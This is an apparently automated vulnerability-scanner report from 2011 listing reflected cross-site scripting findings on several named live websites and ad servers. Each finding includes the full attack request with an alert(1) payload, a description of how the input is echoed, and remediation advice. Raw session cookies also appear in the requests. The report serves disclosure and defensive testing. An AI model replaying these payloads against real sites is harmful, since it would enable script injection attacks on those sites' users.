GET /smgmap-static.htm?accountId=lewisautos&startingZoom=129e9e0"><script>alert(1)</script>352e8afc084&locale=en_US HTTP/1.1 Host: googlev8.dealer.com Proxy-Connection: keep-alive Referer: http://www.volkswagensouthburlington.com/used/Volkswagen/2010-Volkswagen-Jetta+Sportwagen-56dc6e350a0a006500315e084179d2fb.htm User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16 P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Content-Type: text/html;charset=iso-8859-1 X-DDC-Arch-Trace: ,HttpResponse,CookieSet Vary: Accept-Encoding Date: Sat, 23 Apr 2011 15:53:44 GMT Connection: close Set-Cookie: ssoid=831111d60a0a00ed0170c7a3d9b58ea7;path=/;domain=.dealer.com Set-Cookie: ddcpoolid=CmsPoolGoogleV8;path=/; Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Length: 433
The value of the v request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 1a9d6%3balert(1)//aee147c7321 was submitted in the v parameter. This input was echoed as 1a9d6;alert(1)//aee147c7321 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the cnd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d0257'-alert(1)-'1d65a39e68a was submitted in the cnd parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ab?enc=MzMzMzMzA0BI4XoUrkcBQAAAAAAAAABASOF6FK5HAUAzMzMzMzMDQPUMgmY50zQASsYda6b2ziULkbNNAAAAAK7tAADLAQAAGgEAAAIAAACD3QQAhWQAAAEAAABVU0QAVVNEANgCWgAZFokDsg4BAgUCAAQAAAAAWBt0FgAAAAA.&tt_code=vert-15&udj=uf%28%27a%27%2C+2317%2C+1303613744%29%3Buf%28%27c%27%2C+63793%2C+1303613744%29%3Buf%28%27r%27%2C+318851%2C+1303613744%29%3B&cnd=!1BNlHQix8gMQg7sTGAAghckBKIkHMTQzMzMzMwNAQhMIABAAGAAgASj-__________8BSABQAFiZLGAAaJoCd0257'-alert(1)-'1d65a39e68a&referrer=http://www2.wspa.com/news/2011/apr/22/computer-hackers-strike-more-often-2011-ar-1751321/&pp=9FD4EC90B5C5CE8F HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://www2.wspa.com/news/2011/apr/22/computer-hackers-strike-more-often-2011-ar-1751321/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfu=8fG5EfErkX00s]#%2L_'x%SEV/i#-BS4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`FJCe#'.gAbjII9rT^:Vp?%xJEuJ_xgcc?/x+()3bsr'Cdow<veb?3Uv/UVYw=)_4D2ZjV3rbT=:l8]3^OkGzA6-ss1ro'nQbiB4iL#@WoF8*q+%8Ck(Z3co?dyLQh0@6TKK-*L:%LQc0KPP-c*78]Jv/eZc3uvQC6q``1N6p(m049Jmn`V9t>QhMj!HjDo5]s)G-(O-%mSwdj6E*mM.>wnu4RgaTx8L85eBy@1cmd#TjMSFHhH?CKGG).w$E$fK=+G=8CNE:N(LZ6vB3bbu>7P!U1PE:+FT-:Y@6U@6u@Qh
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Mon, 25-Apr-2011 03:13:50 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sat, 23-Jul-2011 03:13:50 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sat, 23-Jul-2011 03:13:50 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG7]PErkX00s]#%2L_'x%SEV/i#+hC4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`FJCe#'.gAbjII9rT^:Vp?%xJEuJ_xgcc?/x+()3bsr'Cdow<veb?3Uv/UVYw=)_4D2ZjV3rbT=:l8]3^OkGzA6-ss1ro'nQbiB4iL#@WoF8*q+%8Ck(Z3co?dyLQh0@6TKK-*L:%LQc0KPOtwh*#Idf1b-0mblYuW#YoWapds8JCvl*MM4t<v#RguUj2DKDc_kw579.tS]!Buu*UhVOvuR!wc1Mto<c]C_i%cwI56_oaKuURO+jVQ]>x9ZA3%-+ha%WWdt(<CYrwlBy9*)'tz)U.+wC'cEc9uMFNt9os87@P@(EU[>Fu<>XZ<4; path=/; expires=Sat, 23-Jul-2011 03:13:50 GMT; domain=.adnxs.com; HttpOnly Date: Sun, 24 Apr 2011 03:13:50 GMT Content-Length: 5240
The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload 11db5<script>alert(1)</script>30c2ff40425 was submitted in the csid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gateway/gw.js?csid=H1097211db5<script>alert(1)</script>30c2ff40425 HTTP/1.1 Host: js.revsci.net Proxy-Connection: keep-alive Referer: http://www.startribune.com/business/120319724.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4dd5f13b&0&&4dafa03c&271d956a153787d6fee9112e9c6a9326; udm_0=MLv38yMNYS5n556rUdZEx/o5eypOaEu8COAR17ri5FFJ0FR/DCVho1i888MpWECz+KvddW96x+ZWMrHZZuFYWRdi0Ttiyn6zmLDSlA1uK95C57yGzucOrJqdmL6fFrDcpSvmOSk7BOclNUt7RWlHZoyNrt1GLRfxm3bRtuo2CfyPwIJ/yXIAQjMu7i9OMYPewidKA0q1/0uUpVDAPnfPRNdmew//1T+ZotabTg8c6ayt0ayU5KxhIlMO0zhOP+L3247oh64Wc2CGn1MgWnIHe9nWSStP+vc6kJiQpsVud+5ttYUkKtL8m1QBsvc2/MfTrSmJXnI0dWUX75l0GP8iD+KrsfI2MNrGUtVIQ+uZpa5N+rfJ3lseYi9c8QjhAvNpVCtRO9ENE5mMruL7893kOpOAY7IcULkyGYGsBCxY4sI+d66lxNMlDF6k5UXCb8knlYN/Ww8/EpdaqhzyZL8eG/1Dj0jowZw0Nb+vX8bLorj2cXoM5TKooNjNwtfIyY/oCL0URLzpE+ULxxBO1PzzSumsnbQQckx94LUaOrT7yu7lzVJmdz68WyvKoVQZN8Yb/mxU8hMOrTYTuin/4XutORAJHPqgXVVZMUEu/kYIQ6h8fItk7HAyphTBHafByMNgzViF+86acuNmqPehmSwyo3bzOGaQ8D7cEC/HS+Km7YhnHldp/ftWGbDtTF1Mk+knFnPQbrlieCuaiTJ48OpD52r2+G/oXon0B2LAbkexGJxvbxgRFoJUuIqP7MvKAg5uf1qRa+CVa0kCPCp2ApjgCjYEUuggGpRMd/ubeKFd8+mErIfNzt3ioYjTAAREuUw/nLZibhMbKs3ak/BgaCjr2wSYrdjv6T2Xm7fVBvuqRw0yq9LZm7fqGntvbSbNQ47Yx5AQ4foj97nVvbrEwlss5I8KXNM+tQ==; rtc_PX8c=MLsvr6dssA9jpgAwLTy07NLkFT5pbG1D0HxZtFIMJ5WMmZvbeI58VT31YjW2r/grkF71Pt6B4W3+U1vgzgHP6Nj/3l7CCsilLpq71jmxvUdE4BZGYpc959fJsSNEYdh2a93/U8ympzOYdZfnH90nEI5qWKl30EvxtUMTaCCWVsIXo80UvQSGSpH11YN+FHSPknkO7SGXPlezd4yuKNwQI8ilQ1yLkGB6eUZJ; rsiPus_3Rvr="MLsXrt8vcS5joAD3TrInbg01LBacmsyl/AQEm6jOjyJqA6EpRXeNR51ybx4rDnCLA/gpu7O7IlAhfzML1bVu8LmHQFSbNcINu1toeEE5kG4lJztdJWI+ba2Q78/jsN+/TlufR9gxXgcR0KMzGJpQAPViuoDXhoAPiFIbHFlNxrqXuwN+xQ650NaUnO1HQ1TC3/173MNSUStg+GcKR4V6DW0TDxufsig2SmtwNKPo/CVSVPlw/2PcAjnGoIKfn96Cy/3cT7qEL7188CCOYVNsOqmkfmiHO0dzVprkHujLnpoQjW13ASg9Stbn7mHurO97LPG0rYCNdYAScMQ="; rsi_us_1000000="pUMdJUmnOBIUlU3AYd6I3CK7z/6DmSuGrhprSQdhBfcX3Bf9Q65g5VpPGcLX2sU1kVDV045frkfYy5Br7miNnNQwIJ50CTWAvaYYGfrlF0/bucCm8HXwQm2UlwXVNuqjF1bW/O+qa97E9yLqh63io2VEQiSrjWc+4QdXD8jYF9BIN/9B2POg2Qo9Ay/zMsrzWsjpzHuGG6hUr8HuElIQy9fBZ5ihJZtRNDYALRkRiTc3nWQnJ+hpt4MzZEz2tZKlPI28GS+PTu7QmfVUvLSS1+JAcFSTY2aJRNgJl5XPPWfs4+quYrigip3tf3nwvQs2vAofrBcZ5z9sF824xRe2LCzYaZW25Iu3WVLM5ZjVodFco02zbjREKJbsIlUGB8Atb9HFC6YCcsOHh2uBI6lJHDfsPvKoGNSYSL7TNUVmeUKoJY8ro+d9lOGFJWEKeGDMCwPrX/g+HCLXp0RhPMtDqBUGgjlcG/Ud8LowgmubueoF9IkukAa0rKObKiW5Q24em8YBstnU842LfaUN5Tf6QLodj7PVE2neT0J6IKSKHqk/pdg1xAteXpgdBXLZQdHV8gNjxjhBME3ZnZWY1SZNo1ePRFpQVx+b/9IC4aKar3PeWVeh/uWoR3B+NYEqDWNfhywIQZ4Bp7CIM91FSjI3h8nTySszYjASr3fOoimoaqOtUp/Drk4R5tepvhL8Ka9L5umM9LigL1RGl7lfgrGdYdlPOFuDG6au0u3Dta/J3iLcr4ltfCDkrk+BQilQqvQgMwVvwKo4n8oN7bNoffMkAbQt0PEphVMVWK7fqWF9zGYV5C9m/XjP+4cFtGZ7bVRUcfd0FSV4+IiWGv1ib7aNhID3Q5wa6eovA7QV6YPCeZ0BWI2gY/hCCXs/pj1fbU/xwIl5wkcHjM8lskScNJdVnojLyQQZeXHVlY6gcidrk4M="; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqYlBtLYIVF5A2r78vfkK4mqrxIcq2FNOs3dJs0lUAJpDPlvN//lxCH/uYAwhrfLSEX/QGzTHrLpVcsD2WuAUdkGz6y/8O3Ed+Hq3bYHDGvt4svjGm0Mpre/ONJrQAdw==
The value of the Q request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c20c0"style%3d"x%3aexpression(alert(1))"edf8f6f1e85 was submitted in the Q parameter. This input was echoed as c20c0"style="x:expression(alert(1))"edf8f6f1e85 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of the REDIRURL request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17897"style%3d"x%3aexpression(alert(1))"a2cf0c13c07 was submitted in the REDIRURL parameter. This input was echoed as 17897"style="x:expression(alert(1))"a2cf0c13c07 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7eb3c<img%20src%3da%20onerror%3dalert(1)>701dbe90b3c was submitted in the REST URL parameter 1. This input was echoed as 7eb3c<img src=a onerror=alert(1)>701dbe90b3c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /favicon.ico7eb3c<img%20src%3da%20onerror%3dalert(1)>701dbe90b3c HTTP/1.1 Host: player.stv.tv Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=2276b588%2D65fd%2D480a%2Dbd7a%2D45e2d0af8043; CFTOKEN=0; __utmz=187638121.1303604918.1.1.utmcsr=reddit.com|utmccn=(referral)|utmcmd=referral|utmcct=/search; __utma=187638121.766996194.1303604918.1303604918.1303604918.1; __utmc=187638121; __utmb=187638121.1.10.1303604918; __utmz=1.1303604918.1.1.utmcsr=reddit.com|utmccn=(referral)|utmcmd=referral|utmcct=/search; __utma=1.1014340304.1303604918.1303604918.1303604918.1; __utmc=1; __utmb=187638121.2.10.1303604918
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a666c<img%20src%3da%20onerror%3dalert(1)>37a13038884 was submitted in the REST URL parameter 1. This input was echoed as a666c<img src=a onerror=alert(1)>37a13038884 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /searcha666c<img%20src%3da%20onerror%3dalert(1)>37a13038884/%22%3E%3Cmarquee%3E%3Ch1%3EXSS/ HTTP/1.1 Host: player.stv.tv Proxy-Connection: keep-alive Referer: http://www.reddit.com/search?q=xss User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca4c4"><img%20src%3da%20onerror%3dalert(1)>f4d47744512 was submitted in the REST URL parameter 2. This input was echoed as ca4c4"><img src=a onerror=alert(1)>f4d47744512 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /search/ca4c4"><img%20src%3da%20onerror%3dalert(1)>f4d47744512/ HTTP/1.1 Host: player.stv.tv Proxy-Connection: keep-alive Referer: http://www.reddit.com/search?q=xss User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e695f(a)c8488e7fd4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search/%22%3E%3Cmarquee%3E%3Ch1%3EXSSe695f(a)c8488e7fd4/ HTTP/1.1 Host: player.stv.tv Proxy-Connection: keep-alive Referer: http://www.reddit.com/search?q=xss User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6c29"%3bc10987591b3 was submitted in the REST URL parameter 2. This input was echoed as a6c29";c10987591b3 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search/a6c29"%3bc10987591b3/ HTTP/1.1 Host: player.stv.tv Proxy-Connection: keep-alive Referer: http://www.reddit.com/search?q=xss User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the slotname request parameter is copied into the HTML document as plain text between tags. The payload 6899e<script>alert(1)</script>d4169fc9e6f was submitted in the slotname parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gampad/ads?correlator=1303613695102&output=json_html&callback=GA_googleSetAdContentsBySlotForSync&impl=s&client=ca-pub-0640823897479847&slotname=86x40_Target_Nav_Ad6899e<script>alert(1)</script>d4169fc9e6f&page_slots=86x40_Target_Nav_Ad&cookie_enabled=1&url=http%3A%2F%2Fwww.startribune.com%2Fbusiness%2F120319724.html&lmt=1303631685&dt=1303613696772&cc=17&biw=956&bih=926&ifi=1&adk=2010173350&u_tz=-300&u_his=1&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&flash=10.2.154&gads=v2&ga_vid=669632137.1303613697&ga_sid=1303613697&ga_hid=1201002597 HTTP/1.1 Host: pubads.g.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.startribune.com/business/120319724.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __utmz=251550727.1303423668.1.1.utmcsr=mgid.com|utmccn=(referral)|utmcmd=referral|utmcct=/ban/home_300_top.html; __utma=251550727.399576100.1303423668.1303423668.1303423668.1
Response
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/javascript; charset=UTF-8 X-Content-Type-Options: nosniff Date: Sun, 24 Apr 2011 03:13:24 GMT Server: gfp-be Cache-Control: private, x-gzip-ok="" X-XSS-Protection: 1; mode=block Content-Length: 2732
GA_googleSetAdContentsBySlotForSync({"86x40_Target_Nav_Ad6899e<script>alert(1)</script>d4169fc9e6f":{"_type_":"html","_expandable_":false,"_html_":"\x3c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"\x3e\x3chtml\x3e\x3chead\x3e\x3cstyle\x3ea:link{color:#f ...[SNIP]...
The value of the d request parameter is copied into a JavaScript inline comment. The payload 6c877*/alert(1)//a9785d1590b was submitted in the d parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: TRP Apache-Coyote/1.1 Last-Modified: Sun, 24 Apr 2011 03:14:33 GMT p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Content-Type: text/javascript;charset=UTF-8 Cache-Control: private, max-age=3600 Expires: Sun, 24 Apr 2011 04:14:33 GMT Date: Sun, 24 Apr 2011 03:14:33 GMT Connection: close Vary: Accept-Encoding Content-Length: 17455
/*! Copyright 2009,2010 the Rubicon Project. All Rights Reserved. No permission is granted to use, copy or extend this code */
/* The requested resource (/oz/scripts/domains/startribune.com6c877*/alert(1)//a9785d1590b/page_parser_hooks.js) is not available */
function oz_trim(A){return A.replace(/^\s+|\s+$/g,"");}function PageParser(){this.timeout=2000;this.doc=document;this.stopwords=null;this.init=function( ...[SNIP]...
The value of the url request parameter is copied into the HTML document as plain text between tags. The payload f0c49<script>alert(1)</script>5947e1fafc3 was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /buttons/count?url=file%3A///C%3A/cdn/2011/04/23/dork/reflected-xss-cross-site-scripting-cwe-79-capec-86-admin.testandtarget.omniture.com_443.htmf0c49<script>alert(1)</script>5947e1fafc3 HTTP/1.1 Host: widgets.digg.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the dart request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7e18'%3balert(1)//ca877ea91 was submitted in the dart parameter. This input was echoed as a7e18';alert(1)//ca877ea91 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /dynamic/homes/tophomes_module.php?do=6&dart=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBhqAYB5GzTZi3HtGHlAeZ5ZXECpH8g_EBAAAAEAEg4YW0CTgAWIGU--4PYMkGsgETd3d3LnN0YXJ0cmlidW5lLmNvbboBCjMwMHgyNTBfYXPIAQnaATJodHRwOi8vd3d3LnN0YXJ0cmlidW5lLmNvbS9idXNpbmVzcy8xMjAzMTk3MjQuaHRtbOABA8ACAuACAOoCElRvcF9TdGFja3NfMzAweDI5OfgC8NEekAOkA5gDpAOoAwHQBJBO4AQB%26num%3D0%26sig%3DAGiWqty0U21kPzJUR_so1JDAuqz2yhPd8Q%26client%3Dca-pub-0640823897479847%26adurl%3Da7e18'%3balert(1)//ca877ea91 HTTP/1.1 Host: ww2.startribune.com Proxy-Connection: keep-alive Referer: http://www.startribune.com/business/120319724.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: BBN2=3spZ6OLqOB1SoYyqTE5ehlGQyLTBTTtiQ_5CYiNLJoE4V6pwyO8LUrQ; rsi_segs=; __gads=ID=f03cfcd82208d24a:T=1303613694:S=ALNI_MZeapzxwp9OE5uXr0-WHOgVAHuqFg
document.write('<div style="width:300px;background-color:white"><!-- start top homes code --><img src="http://stmedia.startribune.com/designimages/tophomes0809.jpg" alt="Is this your next home ...[SNIP]... J0cmlidW5lLmNvbS9idXNpbmVzcy8xMjAzMTk3MjQuaHRtbOABA8ACAuACAOoCElRvcF9TdGFja3NfMzAweDI5OfgC8NEekAOkA5gDpAOoAwHQBJBO4AQB&num=0&sig=AGiWqty0U21kPzJUR_so1JDAuqz2yhPd8Q&client=ca-pub-0640823897479847&adurl=a7e18';alert(1)//ca877ea91http://homes.startribune.com/for-sale/listing/20-13003519"> ...[SNIP]...
2.45. http://ww2.startribune.com/dynamic/homes/tophomes_module.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ww2.startribune.com
Path:
/dynamic/homes/tophomes_module.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cff00'%3balert(1)//5d2a8a1ca84 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cff00';alert(1)//5d2a8a1ca84 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /dynamic/homes/tophomes_module.php?do=6&dart=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBhqAYB5GzTZi3HtGHlAeZ5ZXECpH8g_EBAAAAEAEg4YW0CTgAWIGU--4PYMkGsgETd3d3LnN0YXJ0cmlidW5lLmNvbboBCjMwMHgyNTBfYXPIAQnaATJodHRwOi8vd3d3LnN0YXJ0cmlidW5lLmNvbS9idXNpbmVzcy8xMjAzMTk3MjQuaHRtbOABA8ACAuACAOoCElRvcF9TdGFja3NfMzAweDI5OfgC8NEekAOkA5gDpAOoAwHQBJBO4AQB%26num%3D0%26sig%3DAGiWqty0U21kPzJUR_so1JDAuqz2yhPd8Q%26client%3Dca-pub-0640823897479847%26adur/cff00'%3balert(1)//5d2a8a1ca84l%3D HTTP/1.1 Host: ww2.startribune.com Proxy-Connection: keep-alive Referer: http://www.startribune.com/business/120319724.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: BBN2=3spZ6OLqOB1SoYyqTE5ehlGQyLTBTTtiQ_5CYiNLJoE4V6pwyO8LUrQ; rsi_segs=; __gads=ID=f03cfcd82208d24a:T=1303613694:S=ALNI_MZeapzxwp9OE5uXr0-WHOgVAHuqFg
document.write('<div style="width:300px;background-color:white"><!-- start top homes code --><img src="http://stmedia.startribune.com/designimages/tophomes0809.jpg" alt="Is this your next home ...[SNIP]... XJ0cmlidW5lLmNvbS9idXNpbmVzcy8xMjAzMTk3MjQuaHRtbOABA8ACAuACAOoCElRvcF9TdGFja3NfMzAweDI5OfgC8NEekAOkA5gDpAOoAwHQBJBO4AQB&num=0&sig=AGiWqty0U21kPzJUR_so1JDAuqz2yhPd8Q&client=ca-pub-0640823897479847&adur/cff00';alert(1)//5d2a8a1ca84l=http://homes.startribune.com/for-sale/listing/1814-3985775"> ...[SNIP]...
2.46. http://www.discoverbing.com/Activities/BeEntertained [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.discoverbing.com
Path:
/Activities/BeEntertained
Issue detail
